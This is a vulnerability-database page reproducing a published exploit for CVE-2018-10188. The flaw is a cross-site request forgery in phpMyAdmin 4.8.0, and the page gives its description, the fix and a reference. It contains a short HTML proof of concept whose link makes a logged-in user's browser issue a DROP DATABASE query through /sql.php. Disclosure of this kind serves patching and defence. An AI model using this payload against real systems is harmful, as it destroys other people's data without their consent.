Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-10188

Publish Date: 23 Apr 2018

Author: revengsh

Source

                # Exploit Title: phpMyAdmin 4.8.0 &lt; 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh &amp; @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps
 
 
#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
 
 
&lt;html&gt;
  &lt;body&gt;
    &lt;a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]"&gt;
      Drop database
    &lt;/a&gt;
  &lt;/body&gt;
&lt;/html&gt;
 
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188


<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

phpMyAdmin Cross Site Request Forgery

Vulmon Search

About

Products

Connect